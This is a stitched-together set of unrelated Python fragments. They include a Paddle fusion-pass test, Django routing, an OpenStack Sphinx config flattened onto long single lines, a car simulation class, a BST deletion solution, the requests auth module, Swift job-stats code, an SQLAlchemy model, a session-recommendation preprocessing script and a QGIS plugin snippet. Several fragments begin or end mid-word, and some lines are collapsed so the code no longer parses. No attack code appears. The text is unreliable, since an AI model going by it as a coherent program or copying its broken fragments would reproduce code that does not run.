            # runs with and without the pass see identical data.
            seed = int(os.environ.get("SEED", 0))
            np.random.seed(seed + rank)
            for _ in range(10):
                image_np = np.random.random(size=image.shape).astype('float32')
                yield image_np,

        main_program = paddle.static.default_main_program()
        startup_program = paddle.static.default_startup_program()
        return main_program, startup_program, [image], [loss], reader

    def apply_passes(self, main_prog, startup_prog):
        # Run only the fuse_bn_add_act pass on the program pair.
        pass_manager = PassManager([new_pass("fuse_bn_add_act")])
        pass_manager.apply([main_prog], [startup_prog])
        print(pass_manager.names)

        # The rewritten program must contain the fused forward and
        # backward ops.
        op_type = []
        for op in main_prog.global_block().ops:
            op_type.append(op.type)
        self.assertTrue("fused_bn_add_activation" in op_type)
        self.assertTrue("fused_bn_add_activation_grad" in op_type)

    def test_fuse_bn_add_act(self):
        self.check_main()


if __name__ == "__main__":
    unittest.main()
from django.conf.urls import patterns, include, url
from django.conf import settings

# Here, user contacts.profile will cause some 'mismatch' since contacts is also a module
from profile import ProfileView
from contacts import ContactsView
from authen import Authenticate

# URL fragment names are configurable via settings.CONTACT_URL so the
# capture-group names below stay in sync with the views that read them.
strid = settings.CONTACT_URL['strid']
user = settings.CONTACT_URL['user']
contact = settings.CONTACT_URL['contact']
auth = settings.CONTACT_URL['auth']

# NOTE(review): patterns() was deprecated in Django 1.8 and removed in 1.10;
# if this project upgrades, urlpatterns should become a plain list of url()s.
# Route shapes (names injected from settings):
#   api/<auth>                          -> Authenticate
#   api/<strid:16 word chars>/          -> ProfileView
#   api/<strid>/<contact:digits>/       -> ContactsView
#   <user:5-18 word chars>/<strid>/     -> ProfileView
#   <user>/<strid>/<contact>/           -> ContactsView
urlpatterns = patterns('',
    url(r'^api/'+auth+'$', Authenticate.as_view()),
    url(r'^api/(?P<'+strid+r'>\w{16})/$', ProfileView.as_view()),
    url(r'^api/(?P<'+strid+r'>\w{16})/(?P<'+contact+r'>\d+)/$', ContactsView.as_view()),
    url(r'^(?P<'+user+r'>\w{5,18})/(?P<'+strid+r'>\w{16})/$', ProfileView.as_view()),
    url(r'^(?P<'+user+r'>\w{5,18})/(?P<'+strid+r'>\w{16})/(?P<'+contact+r'>\d+)/$', ContactsView.as_view()),
)
import sys

from django.core.management.base import BaseCommand, CommandError

import nflgame
from terminaltables import AsciiTable

from ...models import Player, Team, Season, Week, WeeklyStats


class Command(BaseCommand):
    """Management command that prints a leaderboard of top players,
    optionally restricted to a single position."""

    help = 'takes option position, displays top players as table'

    def add_arguments(self, parser):
        """Register the positional CLI argument (argparse stores it as a 1-item list)."""
        parser.add_argument('position', nargs=1)

    def handle(self, *args, **options):
        """Entry point: show top players, filtered by position when one was given."""
        position_args = options['position']
        if not position_args:
            Player.show_top_players()
        else:
            Player.show_top_players(position=position_args[0])
ftware # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. # # Keystone documentation build configuration file, created by # sphinx-quickstart on Tue May 18 13:50:15 2010. # # This file is execfile()'d with the current directory set to it's containing # dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import os impo
rt sys # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. BASE_DIR = os.path.dirname(os.path.abspath(__file__)) ROOT_DIR = os.path.abspath(os.path.join(BASE_DIR, "..", "..")) sys.path.insert(0, ROOT_DIR) # -- Gene
ral configuration --------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones. extensions = ['sphinx.ext.autodoc', 'sphinx.ext.coverage', 'sphinx.ext.ifconfig', 'sphinx.ext.graphviz', 'sphinx.ext.todo', 'oslo_config.sphinxext', 'oslo_config.sphinxconfiggen', 'oslo_policy.sphinxext', 'oslo_policy.sphinxpolicygen', 'openstackdocstheme',] todo_include_todos = True # Add any paths that contain templates here, relative to this directory. templates_path = [] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8' # The master doctree document. master_doc = 'index' # General information about the project. project = u'Neutron VPNaaS' copyright = u'2011-present, OpenStack Foundation.' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of documents that shouldn't be included in the build. # unused_docs = [] # List of directories, relative to source directory, that shouldn't be searched # for source files. exclude_trees = [] # The reST default role (for this markup: `text`) to use for all documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. show_authors = True # The name of the Pygments (syntax highlighting) style to use. 
pygments_style = 'native' # A list of ignored prefixes for module index sorting. modindex_common_prefix = ['neutron_vpnaas.'] # -- Options for man page output -------------------------------------------- # Grouping the document tree for man pages. # List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual' #man_pages = [ # ('man/neutron-server', 'neutron-server', u'Neutron Server', # [u'OpenStack'], 1) #] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. Major themes that come with # Sphinx are currently 'default' and 'sphinxdoc'. # html_theme_path = ["."] # html_theme = '_theme' html_theme = 'openstackdocs' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = ['_theme'] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. 
#html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_use_modindex = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = '' # Output file base name for HTML help builder. #htmlhelp_basename = 'neutrondoc' # -- Options for LaTeX output ------------------------------------------------ # The paper size ('letter' or 'a4'). #latex_paper_size = 'letter' # The font size ('10pt', '11pt' or '12pt'). #latex_font_size = '10pt' # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, author, # documentclass [howto/manual]). latex_documents = [ ('index', 'doc-neutron-vpnaas.tex', u'Neutron VPN-as-a-Service Documentation', u'Neutron development team', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # Additional stuff for the LaTeX preamble. #latex_preamble = '' # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. 
#latex_use_modindex = True # Disable usage of xindy https://bugzilla.redhat.com/show_bug.cgi?id=1643664 latex_use_xindy = False latex_domain_indices = False latex_elements = { 'extraclassoptions': 'openany,oneside', 'makeindex': '', 'printindex': '', 'preamble': r'\setcounter{tocdepth}{3}', } # -- Options for openstackdocstheme ------------------------------------------- openstackdocs_repo_name = 'openstack/neutron-vpnaas' openstackdocs_pdf_link = True openstackdocs_auto_name = False openstackdocs_bug_project = 'neutron' openstackdocs_bug_tag = 'doc' # -- Options for oslo_config.sphinxconfiggen --------------------------------- _config_generator_config_files = [ 'vpn_agent.ini', 'neutron_vpnaas.conf', ] def _get_config_generator_config_definition(conf): config_file_path = '../../etc/oslo-config-generator/%s' % conf # oslo_config.sphinxconfiggen appends '.conf.sample' to the filename, # strip file extentension (.conf or .ini). output_file_path = '_static/config_samples/%s' % conf.rsplit('.', 1)[0] return (config_file_path, output_file_path) config_generator_config_file = [ _get_config_generator_config_
# -*- coding: utf8 -*-

import logging
import math

from Graphx import graphx
from GameEngine.GameObjects.gameObjectBehaviour import GameObjectBehaviour
from Brains.human import HumanBrain
from conf import conf


class CarBehaviour(GameObjectBehaviour):
    """
    Behaviour of the car. It handles the car at its current position.
    """
    # FIX: this docstring previously sat *after* brainTypes, where it was a
    # no-op string expression instead of the class __doc__.

    # Maps a brain-type name to the brain class used to drive the car.
    brainTypes = {
        'human': HumanBrain
    }

    def __init__(self, brainType, ruleChecker, model):
        """
        Initialize a new Behaviour object for the car.
        It needs a brain which will take the actual decisions of the actions,
        and the model that holds the state history
        """
        super(CarBehaviour, self).__init__(model)
        self._brain = CarBehaviour.brainTypes[brainType](model)
        self._ruleChecker = ruleChecker
        # Staging values computed by an action, committed to the model in update().
        self._newVelocity = None
        self._newPosition = None
        self._newHeading = None
        # Dispatch table: brain decision name -> action method.
        self._actions = {
            'accelerate': self.accelerate,
            'break': self.breaks,
            'turnRight': self.turnRight,
            'turnLeft': self.turnLeft,
            'halt': self.halt
        }

    def move(self):
        """
        set the new position of the car using the current velocity and
        the current heading
        """
        self._newPosition = \
            (self._model.position[0] +
             self._newVelocity * self._model.headingVector[0],
             self._model.position[1] +
             self._newVelocity * self._model.headingVector[1])

    def halt(self):
        """
        If this action is called at this turn, the velocity and the heading
        stay the same
        """
        self._newVelocity = self._model.velocity
        self._newHeading = self._model.headingAngle
        self.move()

    def accelerate(self):
        """
        Increase the velocity by the car's acceleration
        If max_speed is reached, the car simply keep its current speed.
        The heading does not change
        """
        self._newVelocity = \
            self._model.velocity + self._model.constant('acceleration')
        # Clamp to the model's top speed.
        if self._newVelocity > self._model.constant('max_speed'):
            self._newVelocity = self._model.constant('max_speed')
        self._newHeading = self._model.headingAngle
        self.move()

    def breaks(self):
        """
        Breaks using the car's break constant.
        If the car is already stopped, nothing happen.
        The heading does not change
        """
        self._newVelocity = \
            self._model.velocity - self._model.constant('break')
        # Never move backwards: floor the velocity at zero.
        if self._newVelocity < 0:
            self._newVelocity = 0
        self._newHeading = self._model.headingAngle
        self.move()

    def turnRight(self):
        """
        Turn right relatively to the car's heading
        using the car's maniability.
        The velocity does not change
        """
        self._newHeading = self._model.headingAngle - \
            self._model.constant('maniability')
        self._newVelocity = self._model.velocity
        self.move()

    def turnLeft(self):
        """
        Turn left relatively to the car's heading
        using the car's maniability
        The velocity does not change
        """
        self._newHeading = self._model.headingAngle + \
            self._model.constant('maniability')
        self._newVelocity = self._model.velocity
        self.move()

    def update(self, stateManager):
        """
        Use the brain the take the decision about what is the next action,
        then update the model according to what has been decided.
        """
        decision = self._brain.decision()
        self._actions[decision]()
        # Commit the staged values to the model (rotation first, then velocity
        # and position, matching the order the actions computed them in).
        self._model.rotate(self._newHeading)
        self._model.velocity = self._newVelocity
        self._model.position = self._newPosition
        # self._ruleChecker.check(self._model.getCurrentState(),
        #                         self._model.getPreviousState())
#!/usr/bin/env python3

# Given a root node reference of a BST and a key, delete the node with the
# given key in the BST. Return the root node reference (possibly updated)
# of the BST.
# Basically, the deletion can be divided into two stages:
#   1. Search for a node to remove.
#   2. If the node is found, delete the node.
# Note: Time complexity should be O(height of tree).
#
# Example:
# root = [5,3,6,2,4,null,7], key = 3
#     5
#    / \
#   3   6
#  / \   \
# 2   4   7
# One valid answer is [5,4,6,2,null,null,7]; another is [5,2,6,null,4,null,7].

# Definition for a binary tree node.
# class TreeNode:
#     def __init__(self, val=0, left=None, right=None):
#         self.val = val
#         self.left = left
#         self.right = right

from tree import *


class Solution:
    def deleteNode(self, root: TreeNode, key: int) -> TreeNode:
        """Delete `key` from the BST rooted at `root`; return the new root.

        The deleted node is replaced by the maximum of its left subtree
        (its in-order predecessor), so only O(height) nodes are touched.
        """
        if root is None:
            return None
        if key < root.val:
            root.left = self.deleteNode(root.left, key)
        elif key > root.val:
            root.right = self.deleteNode(root.right, key)
        else:
            node = root
            # No left subtree: the right child (possibly None) takes over.
            if node.left is None:
                return node.right
            # Promote the predecessor, then detach it from the left subtree.
            root = self.getmax(node.left)
            root.left = self.deletemax(node.left)
            root.right = node.right
        return root

    def getmax(self, root):
        """Return the maximum (right-most) node of the subtree, or None."""
        if root is None or root.right is None:
            return root
        # BUG FIX: was a bare `getmax(root.right)` (NameError at call time);
        # the recursion must go through self.
        return self.getmax(root.right)

    def deletemax(self, root):
        """Remove the maximum node from the subtree; return the new subtree root."""
        if root is None:
            return None
        if root.right is None:
            return root.left
        # BUG FIX: was a bare `deletemax(root.right)` (NameError at call time).
        root.right = self.deletemax(root.right)
        return root


nodeString = '[5,3,6,2,4,null,7]'
sol = Solution() root = treeBuilder(nodeString) print('lala') traverse(sol.deleteNode(root, 3))
# -*- coding: utf-8 -*-

"""
requests.auth
~~~~~~~~~~~~~

This module contains the authentication handlers for Requests.
"""

import os
import re
import time
import hashlib

from base64 import b64encode

from .compat import urlparse, str
from .cookies import extract_cookies_to_jar
from .utils import parse_dict_header

CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
CONTENT_TYPE_MULTI_PART = 'multipart/form-data'


def _basic_auth_str(username, password):
    """Returns a Basic Auth string."""

    return 'Basic ' + b64encode(('%s:%s' % (username, password)).encode('latin1')).strip().decode('latin1')


class AuthBase(object):
    """Base class that all auth implementations derive from"""

    def __call__(self, r):
        raise NotImplementedError('Auth hooks must be callable.')


class HTTPBasicAuth(AuthBase):
    """Attaches HTTP Basic Authentication to the given Request object."""

    def __init__(self, username, password):
        self.username = username
        self.password = password

    def __call__(self, r):
        r.headers['Authorization'] = _basic_auth_str(self.username, self.password)
        return r


class HTTPProxyAuth(HTTPBasicAuth):
    """Attaches HTTP Proxy Authentication to a given Request object."""

    def __call__(self, r):
        r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password)
        return r


class HTTPDigestAuth(AuthBase):
    """Attaches HTTP Digest Authentication to the given Request object."""

    def __init__(self, username, password):
        self.username = username
        self.password = password
        # State carried across the 401 round-trip (RFC 2617):
        self.last_nonce = ''
        self.nonce_count = 0
        self.chal = {}      # parsed challenge from WWW-Authenticate
        self.pos = None     # body stream position, for rewinding on resend

    def build_digest_header(self, method, url):
        """Build the value for an ``Authorization: Digest ...`` header from
        the stored challenge. Returns None when the challenge uses an
        unsupported algorithm or qop."""

        realm = self.chal['realm']
        nonce = self.chal['nonce']
        qop = self.chal.get('qop')
        algorithm = self.chal.get('algorithm')
        opaque = self.chal.get('opaque')

        if algorithm is None:
            _algorithm = 'MD5'
        else:
            _algorithm = algorithm.upper()
        # BUG FIX: hash_utf8 was only bound inside the MD5/SHA branches, so an
        # unsupported algorithm hit `if hash_utf8 is None` with the name
        # unbound and raised NameError instead of returning None.
        hash_utf8 = None
        # lambdas assume digest modules are imported at the top level
        if _algorithm == 'MD5' or _algorithm == 'MD5-SESS':
            def md5_utf8(x):
                if isinstance(x, str):
                    x = x.encode('utf-8')
                return hashlib.md5(x).hexdigest()
            hash_utf8 = md5_utf8
        elif _algorithm == 'SHA':
            def sha_utf8(x):
                if isinstance(x, str):
                    x = x.encode('utf-8')
                return hashlib.sha1(x).hexdigest()
            hash_utf8 = sha_utf8

        KD = lambda s, d: hash_utf8("%s:%s" % (s, d))

        if hash_utf8 is None:
            return None

        # XXX not implemented yet
        entdig = None
        p_parsed = urlparse(url)
        path = p_parsed.path
        if p_parsed.query:
            path += '?' + p_parsed.query

        A1 = '%s:%s:%s' % (self.username, realm, self.password)
        A2 = '%s:%s' % (method, path)

        HA1 = hash_utf8(A1)
        HA2 = hash_utf8(A2)

        if nonce == self.last_nonce:
            self.nonce_count += 1
        else:
            self.nonce_count = 1
        ncvalue = '%08x' % self.nonce_count

        # Client nonce: mixed from the count, server nonce, time and random
        # bytes, then truncated — only needs to be unique, not secret.
        s = str(self.nonce_count).encode('utf-8')
        s += nonce.encode('utf-8')
        s += time.ctime().encode('utf-8')
        s += os.urandom(8)

        cnonce = (hashlib.sha1(s).hexdigest()[:16])
        noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, qop, HA2)
        if _algorithm == 'MD5-SESS':
            HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce))

        if qop is None:
            respdig = KD(HA1, "%s:%s" % (nonce, HA2))
        elif qop == 'auth' or 'auth' in qop.split(','):
            respdig = KD(HA1, noncebit)
        else:
            # XXX handle auth-int.
            return None

        self.last_nonce = nonce

        # XXX should the partial digests be encoded too?
        base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
               'response="%s"' % (self.username, realm, nonce, path, respdig)
        if opaque:
            base += ', opaque="%s"' % opaque
        if algorithm:
            base += ', algorithm="%s"' % algorithm
        if entdig:
            base += ', digest="%s"' % entdig
        if qop:
            base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce)

        return 'Digest %s' % (base)

    def handle_401(self, r, **kwargs):
        """Takes the given response and tries digest-auth, if needed."""

        if self.pos is not None:
            # Rewind the file position indicator of the body to where
            # it was to resend the request.
            r.request.body.seek(self.pos)
        num_401_calls = getattr(self, 'num_401_calls', 1)
        # BUG FIX: the challenge lives in the WWW-Authenticate response
        # header; the previous 'www-get_token' name never matches, so digest
        # auth could never trigger.
        s_auth = r.headers.get('www-authenticate', '')

        if 'digest' in s_auth.lower() and num_401_calls < 2:

            setattr(self, 'num_401_calls', num_401_calls + 1)
            pat = re.compile(r'digest ', flags=re.IGNORECASE)
            self.chal = parse_dict_header(pat.sub('', s_auth, count=1))

            # Consume content and release the original connection
            # to allow our new request to reuse the same one.
            r.content
            r.raw.release_conn()
            prep = r.request.copy()
            extract_cookies_to_jar(prep._cookies, r.request, r.raw)
            prep.prepare_cookies(prep._cookies)

            prep.headers['Authorization'] = self.build_digest_header(
                prep.method, prep.url)
            _r = r.connection.send(prep, **kwargs)
            _r.history.append(r)
            _r.request = prep

            return _r

        setattr(self, 'num_401_calls', 1)
        return r

    def __call__(self, r):
        # If we have a saved nonce, skip the 401
        if self.last_nonce:
            r.headers['Authorization'] = self.build_digest_header(r.method, r.url)
        try:
            # Remember the body position so handle_401 can rewind and resend.
            self.pos = r.body.tell()
        except AttributeError:
            pass
        r.register_hook('response', self.handle_401)
        return r
ssert(self.is_driver_job()) return self.stats.get("Driver.NumDriverJobsSkipped", 0) def driver_jobs_total(self): """Return the total count of a driver job's ran + skipped sub-jobs""" assert(self.is_driver_job()) return self.driver_jobs_ran() + self.driver_jobs_skipped() def merged_with(self, other, merge_by="sum"): """Return a new JobStats, holding the merger of self and other""" merged_stats = {} ops = {"sum": lambda a, b: a + b, # Because 0 is also a sentinel on counters we do a modified # "nonzero-min" here. Not ideal but best we can do. "min": lambda a, b: (min(a, b) if a != 0 and b != 0 else max(a, b)), "max": lambda a, b: max(a, b)} op = ops[merge_by] for k, v in self.stats.items() + other.stats.items(): if k in merged_stats: merged_stats[k] = op(v, merged_stats[k]) else: merged_stats[k] = v merged_kind = self.jobkind if other.jobkind != merged_kind: merged_kind = "<merged>" merged_module = self.module if other.module != merged_module: merged_module = "<merged>" merged_start = min(self.start_usec, other.start_usec) merged_end = max(self.start_usec + self.dur_usec, other.start_usec + other.dur_usec) merged_dur = merged_end - merged_start return JobStats(merged_kind, random.randint(0, 1000000000), merged_module, merged_start, merged_dur, self.jobargs + other.jobargs, merged_stats) def prefixed_by(self, prefix): prefixed_stats = dict([((prefix + "." + k), v) for (k, v) in self.stats.items()]) return JobStats(self.jobkind, random.randint(0, 1000000000), self.module, self.start_usec, self.dur_usec, self.jobargs, prefixed_stats) def divided_by(self, n): divided_stats = dict([(k, v / n) for (k, v) in self.stats.items()]) return JobStats(self.jobkind, random.randint(0, 1000000000), self.module, self.start_usec, self.dur_usec, self.jobargs, div
ided_stats) def incrementality_percentage(self): """Assuming the job is a driver job, return the amoun
t of jobs that actually ran, as a percentage of the total number.""" assert(self.is_driver_job()) ran = self.driver_jobs_ran() total = self.driver_jobs_total() return round((float(ran) / float(total)) * 100.0, 2) def to_catapult_trace_obj(self): """Return a JSON-formattable object fitting chrome's 'catapult' trace format""" return {"name": self.module, "cat": self.jobkind, "ph": "X", # "X" == "complete event" "pid": self.jobid, "tid": 1, "ts": self.start_usec, "dur": self.dur_usec, "args": self.jobargs} def start_timestr(self): """Return a formatted timestamp of the job's start-time""" t = datetime.datetime.fromtimestamp(self.start_usec / 1000000.0) return t.strftime("%Y-%m-%d %H:%M:%S") def end_timestr(self): """Return a formatted timestamp of the job's end-time""" t = datetime.datetime.fromtimestamp((self.start_usec + self.dur_usec) / 1000000.0) return t.strftime("%Y-%m-%d %H:%M:%S") def pick_lnt_metric_suffix(self, metric_name): """Guess an appropriate LNT metric type for a given metric name""" if "BytesOutput" in metric_name: return "code_size" if "RSS" in metric_name or "BytesAllocated" in metric_name: return "mem" return "compile" def to_lnt_test_obj(self, args): """Return a JSON-formattable object fitting LNT's 'submit' format""" run_info = { "run_order": str(args.lnt_order), "tag": str(args.lnt_tag), } run_info.update(dict(args.lnt_run_info)) stats = self.stats return { "Machine": { "Name": args.lnt_machine, "Info": dict(args.lnt_machine_info) }, "Run": { "Start Time": self.start_timestr(), "End Time": self.end_timestr(), "Info": run_info }, "Tests": [ { "Data": [v], "Info": {}, "Name": "%s.%s.%s.%s" % (args.lnt_tag, self.module, k, self.pick_lnt_metric_suffix(k)) } for (k, v) in stats.items() ] } AUXPATSTR = (r"(?P<module>[^-]+)-(?P<input>[^-]+)-(?P<triple>[^-]+)" + r"-(?P<out>[^-]*)-(?P<opt>[^-]+)") AUXPAT = re.compile(AUXPATSTR) TIMERPATSTR = (r"time\.swift-(?P<jobkind>\w+)\." 
+ AUXPATSTR + "\.(?P<timerkind>\w+)$") TIMERPAT = re.compile(TIMERPATSTR) FILEPATSTR = (r"^stats-(?P<start>\d+)-swift-(?P<kind>\w+)-" + AUXPATSTR + r"-(?P<pid>\d+)(-.*)?.json$") FILEPAT = re.compile(FILEPATSTR) def match_auxpat(s): m = AUXPAT.match(s) if m is not None: return m.groupdict() else: return None def match_timerpat(s): m = TIMERPAT.match(s) if m is not None: return m.groupdict() else: return None def match_filepat(s): m = FILEPAT.match(s) if m is not None: return m.groupdict() else: return None def load_stats_dir(path, select_module=[], select_stat=[], exclude_timers=False, merge_timers=False, **kwargs): """Loads all stats-files found in path into a list of JobStats objects""" jobstats = [] sre = re.compile('.*' if len(select_stat) == 0 else '|'.join(select_stat)) for root, dirs, files in os.walk(path): for f in files: mg = match_filepat(f) if not mg: continue # NB: "pid" in fpat is a random number, not unix pid. jobkind = mg['kind'] jobid = int(mg['pid']) start_usec = int(mg['start']) module = mg["module"] if len(select_module) != 0 and module not in select_module: continue jobargs = [mg["input"], mg["triple"], mg["out"], mg["opt"]] with open(os.path.join(root, f)) as fp: j = json.load(fp) dur_usec = 1 stats = dict() for (k, v) in j.items(): if sre.search(k) is None: continue if k.startswith('time.') and exclude_timers: continue tm = match_timerpat(k) if tm: v = int(1000000.0 * float(v)) if tm['jobkind'] == jobkind and \ tm['timerkind'] == 'wall': dur_usec = v if merge_timers: k = "time.swift-%s.%s" % (tm['jobkind'], tm['timerkind']) stats[k] = v e = JobStats(jobkind=jobkind, jobid=jobid, module=module, start_usec=start_usec, dur_usec=dur_usec, jobargs=jobargs, stats=stats) jobstats.append(e) return jobstats def merge_all_jobstats(jobstats, select_module=[], group_by_module=False, merge_by="sum", divide_by=1, **kwargs): """Does a pairwise merge of the elements of list of jobs""" m = None if len(select_module) > 0: jobstats = filter(lambda j: j.module in 
select_module, jobstats) if group_by_module: def keyfunc(j): ret
from models import db
from models.Post import Post


class PostFile(db.Model):
    """ORM model linking an uploaded file name to the Post it belongs to."""

    __tablename__ = 'PostFile'

    # Surrogate primary key.
    Id = db.Column(db.Integer, primary_key = True)
    # Foreign key to the owning Post row (Post.Id). NOTE(review): the column
    # intentionally shadows the imported Post class name inside this class body.
    Post = db.Column(db.Integer, db.ForeignKey(Post.Id))
    # Stored file name; presumably a path/name under the upload directory —
    # TODO confirm against the upload handler.
    FileName = db.Column(db.String(128))

    def __init__(self, post, file):
        # `post` is the Post id (integer FK), not a Post instance.
        self.Post = post
        self.FileName = file
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 25 16:20:12 2015

@author: Balázs Hidasi
@lastmodified: Loreto Parisi (loretoparisi at gmail dot com)

Preprocesses the RecSys Challenge 2015 (yoochoose) click log into
train / test / validation splits for session-based recommendation.
"""

import sys
import os

import numpy as np
import pandas as pd
import datetime as dt

# To redirect output to file
class Logger(object):
    # Tee: writes go both to the original stdout and to a log file.
    def __init__(self, filename="Default.log"):
        self.terminal = sys.stdout
        self.log = open(filename, "a")

    def write(self, message):
        self.terminal.write(message)
        self.log.write(message)

    def flush(self):
        # No-op: needed so code that calls sys.stdout.flush() doesn't break.
        pass

sys.stdout = Logger( os.environ['HOME' ] + '/theano.log' )

PATH_TO_ORIGINAL_DATA = os.environ['HOME'] + '/'
PATH_TO_PROCESSED_DATA = os.environ['HOME'] + '/'

# Columns 0,1,2 of yoochoose-clicks.dat are session id, timestamp, item id.
data = pd.read_csv(PATH_TO_ORIGINAL_DATA + 'yoochoose-clicks.dat', sep=',', header=None, usecols=[0,1,2], dtype={0:np.int32, 1:str, 2:np.int64})
data.columns = ['SessionId', 'TimeStr', 'ItemId']
# Convert ISO timestamp strings to POSIX seconds.
data['Time'] = data.TimeStr.apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%dT%H:%M:%S.%fZ').timestamp()) #This is not UTC. It does not really matter.
del(data['TimeStr'])

# Filter: drop single-click sessions, then rare items (<5 clicks), then
# re-check session length since item removal may have shortened sessions.
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>1].index)]
item_supports = data.groupby('ItemId').size()
data = data[np.in1d(data.ItemId, item_supports[item_supports>=5].index)]
session_lengths = data.groupby('SessionId').size()
data = data[np.in1d(data.SessionId, session_lengths[session_lengths>=2].index)]

# Temporal split: sessions ending in the final day (86400 s) form the test set.
tmax = data.Time.max()
session_max_times = data.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_test = session_max_times[session_max_times >= tmax-86400].index
train = data[np.in1d(data.SessionId, session_train)]
test = data[np.in1d(data.SessionId, session_test)]
# Keep only test items seen in training, then re-apply the min-length filter.
test = test[np.in1d(test.ItemId, train.ItemId)]
tslength = test.groupby('SessionId').size()
test = test[np.in1d(test.SessionId, tslength[tslength>=2].index)]
print('Full train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train), train.SessionId.nunique(), train.ItemId.nunique()))
train.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_full.txt', sep='\t', index=False)
print('Test set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(test), test.SessionId.nunique(), test.ItemId.nunique()))
test.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_test.txt', sep='\t', index=False)

# Same last-day split again, inside the training data, to carve out validation.
tmax = train.Time.max()
session_max_times = train.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_valid = session_max_times[session_max_times >= tmax-86400].index
train_tr = train[np.in1d(train.SessionId, session_train)]
valid = train[np.in1d(train.SessionId, session_valid)]
valid = valid[np.in1d(valid.ItemId, train_tr.ItemId)]
tslength = valid.groupby('SessionId').size()
valid = valid[np.in1d(valid.SessionId, tslength[tslength>=2].index)]
print('Train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train_tr), train_tr.SessionId.nunique(), train_tr.ItemId.nunique()))
train_tr.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_tr.txt', sep='\t', index=False)
print('Validation set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(valid), valid.SessionId.nunique(), valid.ItemId.nunique()))
valid.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_valid.txt', sep='\t', index=False)
# FIX: the original literal `[ 1 2 3 ]` is a SyntaxError in Python
# (missing commas); assuming a plain list of the three integers was intended.
a = [
    1, 2, 3,
]
om .data_model import PGSqlResultModel return PGSqlResultModel(self, sql, parent) def registerDatabaseActions(self, mainWindow): Database.registerDatabaseActions(self, mainWindow) # add a separator separator = QAction(self) separator.setSeparator(True) mainWindow.registerAction(separator, self.tr("&Table")) action = QAction(self.tr("Run &Vacuum Analyze"), self) mainWindow.registerAction(action, self.tr("&Table"), self.runVacuumAnalyzeActionSlot) action = QAction(self.tr("Run &Refresh Materialized View"), self) mainWindow.registerAction(action, self.tr("&Table"), self.runRefreshMaterializedViewSlot) def runVacuumAnalyzeActionSlot(self, item, action, parent): QApplication.restoreOverrideCursor() try: if not isinstance(item, Table) or item.isView: parent.infoBar.pushMessage(self.tr("Select a table for vacuum analyze."), QgsMessageBar.INFO, parent.iface.messageTimeout()) return finally: QApplication.setOverrideCursor(Qt.WaitCursor) item.runVacuumAnalyze() def runRefreshMaterializedViewSlot(self, item, action, parent): QApplication.restoreOverrideCursor() try: if not isinstance(item, PGTable) or item._relationType != 'm': parent.infoBar.pushMessage(self.tr("Select a materialized view for refresh."), QgsMessageBar.INFO, parent.iface.messageTimeout()) return finally: QApplication.setOverrideCursor(Qt.WaitCursor) 